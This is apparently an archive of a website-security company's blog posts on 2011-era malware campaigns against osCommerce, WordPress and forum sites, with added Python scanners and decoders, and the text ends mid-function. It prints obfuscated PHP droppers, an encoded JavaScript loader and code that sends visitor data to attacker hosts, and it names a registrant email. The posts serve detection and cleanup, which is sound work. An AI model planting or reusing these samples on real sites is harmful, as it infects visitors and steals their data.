Archive

Posts Tagged ‘blacklisting’

DragosImport, Domboware Attacks

December 5th, 2011

In recent weeks, two websites have increasingly been used to mount attacks on unsuspecting visitors of legitimate, benign sites compromised by malicious hackers. This post discusses the details of these distribution sites.

Is my site infected?
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/

We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.

Which sites are aiding the attack?
The list below includes sites participating in the distribution of the malware thus far.

www.cledwilliams.co.uk
decohouz.com
www.scanstore.nl
www.blackmoresnight.com
www.ldguideservice.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…


Willysy Injection Attacks

December 1st, 2011

Code injection attacks are now affecting millions of websites on the Internet. It is no longer an option to leave your website unprotected.

We will be discussing the major outbreak of the “willysy.com” injection attacks in this article that at one time affected more than 100,000 websites.

What is the Willysy attack?
This particular code injection attack leads to the injection of malicious Iframes by malicious hackers into benign websites. The Iframe is an HTML element that can be used to load content from a different website into the pages on your own website. Think of it as a shipping container that fits like a lego block on your ship, and the container can contain cargo from a source that you have no control over.

This Iframe element is used to load malware content from exploit sites after a benign website is compromised and an iframe is injected and embedded inside the webpage. When trusting visitors view these webpages, they are infected with the malware.

What vulnerabilities are being exploited?
osCommerce sites are being targeted primarily with this attack and the following vulnerabilities in osCommerce are being exploited:

These exploits are used to infect benign, legitimate sites. Once the malware is injected onto these exploited sites, visitors to these sites are infected through various mechanisms used to install the malware on the visitors’ machines. Some of the mechanisms used to infect visitors’ computers involve browser exploits like the ones listed below.

CVE-2010-1885
CVE-2010-0886
CVE-2010-0188
CVE-2006-0003

Is my website infected?
In order to determine whether your website is infected or not, search for instances of the malware listed below using tools like grep (or wingrep) or have StopTheHacker’s Health Monitoring service do it for you.

Search for the following malware:

<iframe src='hxxp://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>

Search for the following malware closely associated with the willysy.com infection:

<script src=hxxp://exero.eu/catalog/jquery.js></script>

If you see an occurrence of this malware on your website, your website has been compromised. You will need to clean up the infection by deleting the instances of the malware from your webpages.

Another way to check for infection is to search your server log files for accesses from the IP addresses below. If you do find these IP addresses in your log files, you should pay special attention to determining whether your site has been compromised.

178.217.163.214
178.217.165.111
178.217.165.71

Additionally, if your site is using osCommerce you should be even more alert. Since this infection seems to be more prevalent amongst osCommerce websites, please download the latest version of osCommerce and ensure that the permissions of your admin folders are set correctly (to 644 or something more restrictive).
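The checks described in the two posts above (DragosImport/Domboware and Willysy), collected into one scanner as an added example that is not the posts' own code: it greps web files for the listed script, iframe and PHP signatures and pulls requests from the three listed source addresses out of a combined-format access log. The page, PHP and log samples are constructed for the demonstration.

```python
import os
import re

# Signatures copied from the DragosImport/Domboware and Willysy posts above.
# The "hxxp" defanging used in the posts is accepted alongside "http", so the
# patterns match both a report and live page content.
SIGNATURES = {
    "dragosimport_script": re.compile(
        r"script\s+src=[\"']?h(?:xx|tt)p://dragosimport\.com/js/", re.I),
    "domboware_script": re.compile(
        r"script\s+src=[\"']?h(?:xx|tt)p://domboware\.hu/js/", re.I),
    "eva1_php_dropper": re.compile(
        r"@error_reporting\(0\);\s*if\s*\(!isset\(\$eva1", re.I),
    "willysy_iframe": re.compile(
        r"<iframe\s+src=[\"']?h(?:xx|tt)p://willysy\.com/images/banners/", re.I),
    "exero_script": re.compile(
        r"<script\s+src=[\"']?h(?:xx|tt)p://exero\.eu/catalog/jquery\.js", re.I),
}

# Source addresses the Willysy post associates with the attack.
SUSPECT_IPS = {"178.217.163.214", "178.217.165.111", "178.217.165.71"}

# Apache/nginx combined log prefix: client IP, identity, user, [timestamp], "METHOD PATH ..."
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)')

SCAN_EXTENSIONS = (".php", ".html", ".htm", ".js", ".inc")


def scan_text(text):
    """Return (signature name, line number, excerpt) for every line hit in one file."""
    hits = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in SIGNATURES.items():
            if pattern.search(line):
                hits.append((name, lineno, line.strip()[:80]))
    return hits


def scan_webroot(root):
    """Walk a document root and scan every file with a web-facing extension.

    Files are read as latin-1 so obfuscated byte sequences never raise decode errors."""
    report = {}
    for dirpath, _, filenames in os.walk(root):
        for filename in filenames:
            if not filename.lower().endswith(SCAN_EXTENSIONS):
                continue
            path = os.path.join(dirpath, filename)
            with open(path, encoding="latin-1") as handle:
                hits = scan_text(handle.read())
            if hits:
                report[path] = hits
    return report


def suspect_requests(log_lines):
    """Return {ip: [(method, path), ...]} for requests from the listed addresses."""
    found = {}
    for line in log_lines:
        match = LOG_LINE.match(line)
        if match and match.group(1) in SUSPECT_IPS:
            found.setdefault(match.group(1), []).append((match.group(2), match.group(3)))
    return found


# Constructed samples (not captures from a real site) used to exercise the functions.
SAMPLE_PAGE = """<html><head><title>Shop</title>
<script src="http://exero.eu/catalog/jquery.js"></script>
</head><body>
<iframe src='http://willysy.com/images/banners/' style='position:absolute;visibility:hidden'></iframe>
<p>Welcome to the catalog.</p></body></html>"""

SAMPLE_PHP = "<?php @error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = '7kyJ';} ?>"

SAMPLE_LOG = [
    '178.217.165.71 - - [01/Dec/2011:10:00:01 +0000] "GET /admin/ HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Dec/2011:10:00:02 +0000] "GET /index.php HTTP/1.1" 200 2048',
    '178.217.163.214 - - [01/Dec/2011:10:00:03 +0000] "GET /catalog/ HTTP/1.1" 200 4096',
]

if __name__ == "__main__":
    for hit in scan_text(SAMPLE_PAGE) + scan_text(SAMPLE_PHP):
        print("page/php hit:", hit)
    for ip, requests in suspect_requests(SAMPLE_LOG).items():
        print("suspect source:", ip, requests)
```

Point scan_webroot() at the document root to get a per-file report; a hit is a reason to investigate, and a clean scan is not proof of a clean site because the signatures change.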

Which sites are aiding the attack?
The list below includes sites used to spread the malware thus far.


Who owns these malicious sites?
The registrant for the malware distribution site arhyv.ru is:

leshkinaira@yahoo.com

Source: Forum entry at DSLreports.com.

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…


Simple Machines Malware

November 8th, 2011

Simple Machines is a forum software used by thousands of website owners around the world to build online communities into their websites. Unfortunately, it is a perfect target for malicious hackers too. Finding a way to compromise the Simple Machines installation to inject malware into a legitimate website thereby infecting its visitors is an attractive proposition for malicious hackers.

This post will detail a fast-growing new strain of malware that has targeted Simple Machines enabled websites. At the time of posting, close to 30,000 websites have been infected with this malware. We detail the attack below.

The malware
This malware is primarily found in the form of a script element that contains the various commands to infect the website visitor.

Interestingly, this malware also creates an Iframe element that loads additional malware from an external website. Notice the Iframe element at the end of the sample below (this creates a link to m-e.crossfitharlem.net).

Malware sample (JavaScript):

<script>b=new function(){return 2;};try{app[1][2]}catch(q){ss="";}try{gberbger-2;}catch(q){s=String;}ddd=new Date();d2=new Date(ddd.valueOf()-2);Object.prototype.asd='e';if('e'==={}.asd)a=document['createTextNode']('321');if(a.nodeValue==321)h=(ddd-d2)*-1;n='4.5a4.5a52.5a51a16a20a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.
5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a57.5a58a24.5a19.5a16a59.5a52.5a50a58a52a30.5a19.5a24.
5a24a19.5a16a52a50.5a52.5a51.5a52a58a30.5a19.5a24.5a24a19.5a16a57.5a58a60.5a54a50.5a30.5a19.5a59a52.
5a57.5a52.5a49a52.5a54a52.5a58a60.5a29a52a52.5a50a50a50.5a55a29.5a56a55.5a57.5a52.5a58a52.5a55.
5a55a29a48.5a49a57.5a55.5a54a58.5a58a50.5a29.5a54a50.5a51a58a29a24a29.5a58a55.5a56a29a24a29.5a19.5a31a30a23.5a52.5a51a57a48.5a54.5a50.5a31a17a20.5a29.5a4.5a4.5a62.5a4.5a4.5a51a58.5a55a49.5a58a52.5a55.5a55a16a52.5a51a57a48.5a54.5a50.5a57a20a20.5a61.5a4.5a4.5a4.5a59a48.5a57a16a51a16a30.5a16a50a55.5a49.5a58.5a54.5a50.5a55a58a23a49.5a57a50.5a48.5a58a50.5a34.5a54a50.5a54.5a50.5a55a58a20a19.5a52.5a51a57a48.5a54.5a50.5a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a57.5a57a49.5a19.5a22a19.5a52a58a58a56a29a23.5a23.5a54.5a22.5a50.5a23a49.5a57a55.5a57.5a57.5a51a52.5a58a52a48.5a57a54a50.5a54.5a23a55a50.5a58a23.5a61a23.5a57.5a58a24.5a19.5a20.5a29.5a51a23a57.5a58a60.5a54a50.5a23a59a52.5a57.5a52.5a49a52.5a54a52.5a58a60.5a30.5a19.5a52a52.5a50a50a50.5a55a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a56a55.5a57.5a52.5a58a52.5a55.5a55a30.5a19.5a48.5a49a57.5a55.5a54a58.5a58a50.5a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a54a50.5a51a58a30.5a19.5a24a19.5a29.5a51a23a57.5a58a60.5a54a50.5a23a58a55.5a56a30.5a19.5a24a19.5a29.5a51a23a57.
5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a59.5a52.5a50a58a52a19.5a22a19.5a24.5a24a19.5a20.5a29.5a51a23a57.5a50.5a58a32.5a58a58a57a52.5a49a58.5a58a50.5a20a19.5a52a50.5a52.5a51.5a52a58a19.5a22a19.5a24.5a24a19.5a20.5a29.5a4.5a4.5a4.5a50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5';n=n
['split']('a');for(i=0;i!=n.length;i++)if(!+b)ss+=s.fromCharCode(-h*eval("n"+"[i]"));if(a.nodeValue==321)eval(ss);</script><iframe style="visibility:
hidden; position: absolute; left: 0pt; top: 0pt;" src="hxxp://m-e.crossfitharlem.net/z/st1" height="10" width="10"></iframe></body></html>
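To see what the sample above hands to eval() without running it, here is an added decoder (not code from the post) that mirrors the sample's own transform: the -h factor derived from the two Date objects, the split on the letter "a", and fromCharCode. PAGE_TAIL is the end of the encoded string exactly as printed above; CONSTRUCTED is built here only to show the round trip.

```python
import re

# In the sample, n is split on the letter "a" and every token is fed to
# String.fromCharCode(-h * n[i]).  h comes from (ddd - d2) * -1 where d2 is the
# current time minus 2 ms, so -h == 2 and each token is half a character code.
SEPARATOR = "a"


def derive_multiplier(now_ms, earlier_ms):
    """Mirror h = (ddd - d2) * -1 and return the factor -h the decoder applies."""
    h = (now_ms - earlier_ms) * -1
    return -h


def decode_payload(encoded, multiplier=2):
    """Rebuild the text the sample hands to eval() without executing anything."""
    chars = []
    for token in encoded.split(SEPARATOR):
        if token:
            chars.append(chr(int(float(token) * multiplier)))
    return "".join(chars)


def encode_payload(text, multiplier=2):
    """Inverse transform, used here only to build a constructed test string."""
    tokens = []
    for ch in text:
        value = ord(ch) / multiplier
        tokens.append(str(int(value)) if value.is_integer() else str(value))
    return SEPARATOR.join(tokens)


# Accept the hxxp defanging used in the post as well as plain http(s).
URL_RE = re.compile(r"h(?:xx|tt)ps?://[^\s'\"<>]+")


def extract_urls(decoded):
    """Pull remote locations out of decoded script text for blocking and triage."""
    return URL_RE.findall(decoded)


# Tail of the encoded string as printed in the post above: the last DOM call
# of the injected function and its closing brace.
PAGE_TAIL = ("50a55.5a49.5a58.5a54.5a50.5a55a58a23a51.5a50.5a58a34.5a54a50.5a54.5a50.5a55a58a57.5"
             "a33a60.5a42a48.5a51.5a39a48.5a54.5a50.5a20a19.5a49a55.5a50a60.5a19.5a20.5a45.5a24"
             "a46.5a23a48.5a56a56a50.5a55a50a33.5a52a52.5a54a50a20a51a20.5a29.5a4.5a4.5a62.5")

# Constructed (not from the post) encoding of the iframe source the post names.
CONSTRUCTED = encode_payload("f.setAttribute('src','hxxp://m-e.crossfitharlem.net/z/st1');")

if __name__ == "__main__":
    print(repr(decode_payload(PAGE_TAIL)))
    print(extract_urls(decode_payload(CONSTRUCTED)))
```

The nodeValue and Object.prototype checks in the sample only pass in a real browser DOM, which is why a static decoder like this recovers the payload where a non-browser sandbox sees nothing.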

What does the malware do?
Malicious code (PHP) like that below has been found on the compromised websites.

The code executes in two phases:

  1. The code below transfers information (user agent, IP address, etc…) to conqstat.com.
  2. The Javascript mentioned above is returned as a reply.

Malware sample (PHP):

<?php
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics
        $stCurlLink = base64_decode( 'aHR0cDovL2NvbnFzdGF0LmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink );
[snipped...]
?>

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…


nl.ai p,a,c,k,e,d Malware

November 7th, 2011

Malicious hackers are continuing to find new ways to infect benign websites. A recent spate of attacks on WordPress powered sites proves this more strongly than ever.

One popular method for infecting WordPress powered websites is to infect a file called “wp-settings.php”. The malware is then spread from this file to all subsequent requests for webpages on the compromised website.

The malware
Usually the malware shown below appears at the top of the page, in the head section of the webpage. Please check your source code.

Malware sample:

<script>eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k1||e(c)}k=[function(e){return d[e]}];e=function(){
...snipped..
t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|MakeFrameEx|element|yahoo_api|height| width|display|none|body|getElementById|function|createElement|iframe|appendChild|src|id|nl|msie |toLowerCase|opera|webtv||setTimeout|windows|http|userAgent|1000|juyfdjhdjdgh|navigator|ai| showthread|ph
</script>

Steps to remove the malware

  1. Access your hosting account via SSH or SFTP.
  2. Remove the malware inserted into the file “wp_inc/upd.php”, located in your “/tmp” folder or in your WordPress installation directory. NOTE: Some of our readers have reported that the malware can also reside in a file called revisions-js.php, so please search in this file too. (Thanks to our readers!)
  3. Remove the following code from the file “wp-settings.php”, usually found in your WordPress installation directory:
function check_wordpress(){
$t_d = sys_get_temp_dir();
if(file_exists($t_d . '/wp_inc')){
readfile($t_d . '/wp_inc');
}
}
add_action('wp_head', 'check_wordpress');
do_action( 'init' );

What does the malware do?
The injected PHP code causes your WordPress installation to load the malware located inside a file named “wp_inc/upd.php” (usually in your “/tmp” folder). The malware then builds an Iframe element pointing to one of many different websites.

Malware destination sites:

hxxp://juyfdjhdjdgh.nl.ai/showthread.php
hxxp://myftp.org/
hxxp://coom.in/

How did this happen?
One of the primary vectors for an attack like this one is stolen user credentials. Do not store your user name and passwords in your FTP client or other similar applications like FileZilla.

Additionally, make sure your WordPress install is up-to-date and that all third-party plugins, like timthumb, are updated too.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…


osCommerce Attacks

November 7th, 2011

Malicious hackers are always looking to exploit software used by website owners to power their websites. One popular type of application that malicious hackers target is shopping carts, like osCommerce. This allows them to compromise a large number of websites using the software, infecting the visitors to these sites with malware.

We have described how malicious hackers exploit osCommerce installations in a past article. This post details a new piece of malware that is affecting osCommerce websites.

The attack
Shopping carts like osCommerce are prime targets for malicious hackers since they are widely used, store a plethora of sensitive information, and are a prime vector for embedding malware on a website to infect visitors and customers.

A recent trend is to display fake Anti-Virus pop up advertisements to visitors of a site when they land on an infected webpage. The following websites are being used to distribute the fake Anti-Virus malware.

Sites distributing the malware:

roybeth.com
schenkenbrunn.at
puremojofoto.com
pindating.com
nadobolchetrafa.cx.cc

Compromised websites in the wild
One example of a site infected with this specific malware is: www.surfmonster.co.uk. Take a look at the code below to see how the malware has been appended to the JavaScript.

A sample of the actual malware:

i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php";try { s=document.createElement("script"); s.src=ss; document.body.appendChild( s ); } catch(erst){ }

A more detailed description of how the malware is appended is presented in one of our previous posts.

      this.hook.enabled = 1;

        // Cache so updates are infrequent.
        tiles.old = {
                w: elmW,
                h: elmH,
                x: bgX,
                y: bgY,
                r: bgR
        };
};
var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }var i,s,ss="http://ajax.googleapis.com/ajax/libs/jquery/1.5.1/jquery.min.js",ss="http://roybeth.com/ext/jquery.php"; try { s=document.createElement("script"); s.src=ss; document.body.appendChild(s); } catch(erst) { }

Recommended steps
First, remove the malware. Then, upgrade your installation of osCommerce and analyze your website for application vulnerabilities. Additionally, securing the permission settings of your “admin” directory or renaming the directory to a value different than the default can mitigate automated attacks.

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…


Domain Chaining Attacks

October 17th, 2011

Malicious hackers are constantly changing tactics in order to evade detection. One of the relatively new mechanisms that has been used to infect thousands of websites on the Internet is known as Domain Chaining.

Domain Chaining is the act of using multiple malware infected domains to form a network that distributes exploit code to benign, legitimate, websites that get compromised. This allows malicious hackers to reliably push exploit code to thousands of compromised websites, infecting the websites themselves and in turn the visitors to these sites.

What is a Domain Chaining attack?
Domain Chaining attacks have been on the rise since the beginning of this year.

The basic concept is as follows:

  1. Malicious hackers register multiple websites specifically to spread malware. This malware may exploit browser vulnerabilities to infect visitors’ computers or may redirect unsuspecting users to websites that prompt them to install fake anti-virus software on their computer.
  2. As in traditional attacks, the malicious hackers use a network of compromised, but legitimate, websites in addition to the dedicated malware distribution websites they registered to widely spread their malware across the Internet.

Why do malicious hackers use this approach?
There are a few benefits to using this mechanism. The first being that it becomes difficult for signature-based and honeypot-based detection systems to home in on the actual source of the malware versus only identifying the distribution points. Another “benefit” is what can be called “failover.”

We have blogged in the past about hackers’ understanding of the need for failover. If a security organization identifies one website in the malware chain as dangerous and manages to shut it down, the remaining distribution points keep delivering the actual exploit to website visitors, so distribution does not stop. Think of it like a multi-headed Hydra.

How do I know if my site is infected?
If your website is part of this Domain Chaining attack, it will most likely have one of these files.

script.php
cssminibar.js
sidename.js
jtoolsmini.js
tempjs.js
js.php
jstools.js

What do these files do?
These scripts load code from infected websites harboring malicious Iframes. The malicious Iframes in turn load exploit code via maliciously registered sites.

Maliciously registered sites related to this attack:

brkfnrmnk.co.cc
brlgnknc.co.cc

Maliciously registered sites related to previous Domain Chaining attacks:

klubnika34his.com
bogdantevye.ru
jwjmusic.cx.cc
frankieeus.ru
gaufridboris.ru
stephanos.ru

The malicious website content is primarily distributed by a file named “wpqonfig.php” that redirects Iframes and scripts to a maliciously registered website.

What script is used in the current attacks?
The latest version of this Domain Chaining attack uses the following script:

nbnjkl.com/urchin.js

How do I protect my site?
Malicious hackers are constantly changing their tactics in order to evade detection and to continue to infect unsuspecting users. It is imperative to keep up-to-date on the latest ways that infections are spreading to legitimate websites.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website now.

Till next time…


BlackHole Toolkit: Malware Running Wild

May 31st, 2011

Malicious hackers are infecting websites in droves using new kinds of malware. Websites are the newest malware battleground. Benign websites are being compromised and infected by hackers in order to infect their visitors. In the vast majority of cases, the affected website owners are completely oblivious to the fact that a malicious hacker has used their website to infect their visitors.

In this article we will discuss a widespread strain of malware that is already behind nearly 100,000 attempts per day, logged on IPS (Intrusion Prevention System) or IDS (Intrusion Detection System) devices, to infect websites.

What are Toolkits?
Malicious hackers sometimes use toolkits, pre-packaged pieces of computer code, which make it very easy to distribute malware, infect websites with it and then perform specific malicious activities with the now compromised site(s).

The strain of malware which we will discuss is related to a toolkit popularly known as the Blackhole Toolkit. This toolkit has been available for some time now and researchers at Symantec have noted the same.

How the toolkit works:

  1. Unsuspecting Internet surfers visit websites harboring malicious IFrame tags
  2. Users are then redirected to servers which load malicious payloads via browser exploits or PDF, SWF based exploits
  3. Often, a malicious JAR file is downloaded on the PC of the unsuspecting client
    • This JAR file contains malicious URLs which download further malware
  4. The downloaded trojan(s) can post a unique ID to a command-and-control server
  5. The trojan then posts a list of the running processes on the victim’s computer to the server
  6. The following three plugins are then downloaded:
    • stopav.plug – Tries to disable the antivirus installed on the victim’s computer
    • passw.plug – Log username/password combinations for connections being made
    • miniav.plug – Tries to delete copies of Zeus bots on the computer to prevent competition amongst malware on victim’s computer
  7. Finally, a fake Anti-Virus program is downloaded to the victim’s computer.

How to Identify an Infected Website
Search for instances of the following PHP code in files on your server or locate the JavaScript in the webpages delivered to clients. Below is a sample of the PHP code which aids the installation of this malware.

$var="kfb2rpgv"; echo base64_decode(str_rot13

The JavaScript produced by this code:

try{try{a1=a2}catch(a){b[2]=21};}catch(a){k="ReferenceErr"+a.toString().substr(0,0);};var ar=">a)myuA1NhTvB\";zEr0c.pi (sngC}{d?lwt

The malicious IFrames generated as a result load content from the following sites:


If you think you are facing a problem related to this specific strain of malware, please scan your computer with an Anti-Virus program (scanning with multiple Anti-Virus engines can yield better results).

We Can Help!
If you want to protect your site from infection, or you need additional support, please sign up for one of our services. Please contact us with your comments or questions.


Analyzing the Google Blacklist, Part 2

June 30th, 2010

Building on our first article in the series, we continue to analyze the Google Safe Browsing List. In this part, we present more detailed statistics about the hashes seen on the blacklist and try to provide insight into what we observe.

Motivation
Understanding the behavior of infected websites is very important. This provides security researchers with strategies to help deal a blow to the bad guys and at the same time, provide website owners and administrators an idea of the current state of website security.

Since the publication of our last article in this series, we have received good feedback from our colleagues in security. We will attempt to incorporate their comments and concerns in this part of the series.

Methodology
We discussed the aim of this experiment and methodology in the last part of this series. We won’t repeat them here, but we encourage you to take a look at our first article in this series if you haven’t already read it!

Analysis
Below we present some graphs which provide more information about the analysis.

  • Websites have a high probability of getting hacked on a Wednesday!

  • Websites have a high probability of getting hacked between 7-8 PM PDT.

  • On Monday websites get hacked most between 11 AM to 12 Noon, PDT
  • On Tuesday websites get hacked most between 9 AM to 10 AM, PDT
  • On Wednesday websites get hacked most between 7 PM to 8 PM, PDT
  • On Thursday websites get hacked most between 10 PM to 11 PM, PDT
  • On Friday websites get hacked most between 11 AM to 12 Noon, PDT
  • On Saturday websites get hacked most between 1 PM to 2 PM, PDT
  • On Sunday websites get hacked most between 11 AM to 12 Noon, PDT

Note: Most hashes which stay on the blacklist (over the 113 day period) seem to get added to the blacklist on Wednesday.

Conclusions
We have presented more interesting statistics regarding the appearance of website hashes on the Google Safe Browsing List. These statistics provide information that website administrators and owners can use to better arm themselves against attackers. We will continue analyzing the dataset to provide more interesting information. If you have any questions please add a comment.

At stopthehacker.com, we work hard to help you combat malicious hackers. If you would like to work with us, please drop us an email. You can also visit our services page to find out how we can help you, in fact you can even sign up for free services!

Till next time…


Is User Trust More Effective Than Blacklisting?

April 6th, 2010

Blacklists are published by many security groups and organizations around the world to share knowledge about malicious websites, IP addresses and other security features which allow others to insulate themselves from the dark side of the Internet.

In recent years, the number of blacklists being published by web-centric organizations has grown by leaps and bounds. Large Internet-based companies such as Google, Yahoo and Microsoft have been providing cues to their users about malicious websites in an effort to make the Internet a safer place. Google provides much more in-depth information than the other two, Yahoo and Bing, and seems to have sophisticated virtual-machine-based analysis tools that can detect misbehaving malicious code. Yahoo employs McAfee’s Search scan service while Bing potentially uses Microsoft-specific technologies.

Experiment Goal

The aim of this experiment is to compare the coverage of the blacklists published by Google, Yahoo and Bing and to compare them to what users on the Internet believe. To do this we compare the results of Google, Yahoo, Bing and Malware Patrol with Web of Trust (WOT). Furthermore, we have also tried to see how many of these malicious URLs are also involved in phishing. We have done this by looking up each URL/domain via Phishtank’s API.

Blacklists provide an easy mechanism for users (via browsers) and developers (via APIs) to assimilate security information about websites, IPs and such in order to make an informed decision about whether to allow or deny access to an IP or website.

Methodology

We collected 1095 confirmed malicious links from MalwareURL. Each of these links was tested to determine whether it is listed on the blacklists supplied by Google, Yahoo and Bing. Note that, unlike Google, Yahoo and Bing do not provide any direct APIs to probe their databases. Therefore each link, and its associated domain, was submitted via an HTTP request to Yahoo and Bing and the results were analyzed to see whether they indicated that the domain/link was infected.

To determine if a website is present in the Google malware blacklist, the domain name along with the link and its variations, as defined here, are converted to MD5 hashes and checked using Google’s Safe Browsing API. For Malware Patrol, the aggressive version of their blacklist is downloaded and comparisons are made locally. For WOT, we employ their XML based API to gather information about the belief of users in the Internet. For Phishtank we have used their XML based API. The tests were conducted on Mar 22 2010.
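The hash lookup described above, as an added example rather than the authors' test harness: it expands a URL into the host-suffix/path-prefix expressions the Safe Browsing v1 protocol had clients check (as recalled from that protocol's documentation, an assumption) and computes the MD5 and the short list prefix of each. Full URL canonicalisation (percent-decoding, fragments, dot segments) is omitted.

```python
import hashlib
from urllib.parse import urlsplit

# Candidate generation follows the host-suffix / path-prefix rules of the
# Safe Browsing v1 protocol as recalled from its documentation (an assumption,
# not the post's own code). Canonicalisation steps are left out for brevity.


def host_candidates(host):
    """Exact host plus up to four suffixes taken from the last five labels,
    never a bare top-level domain. Raw IP addresses yield only themselves."""
    if host.replace(".", "").isdigit():
        return [host]
    labels = host.split(".")
    candidates = [host]
    for i in range(max(0, len(labels) - 5), len(labels) - 1):
        suffix = ".".join(labels[i:])
        if suffix not in candidates:
            candidates.append(suffix)
    return candidates


def path_candidates(path, query):
    """Exact path with and without its query, then up to four directory prefixes."""
    candidates = []
    if query:
        candidates.append(path + "?" + query)
    candidates.append(path)
    segments = [s for s in path.split("/") if s]
    if not path.endswith("/"):
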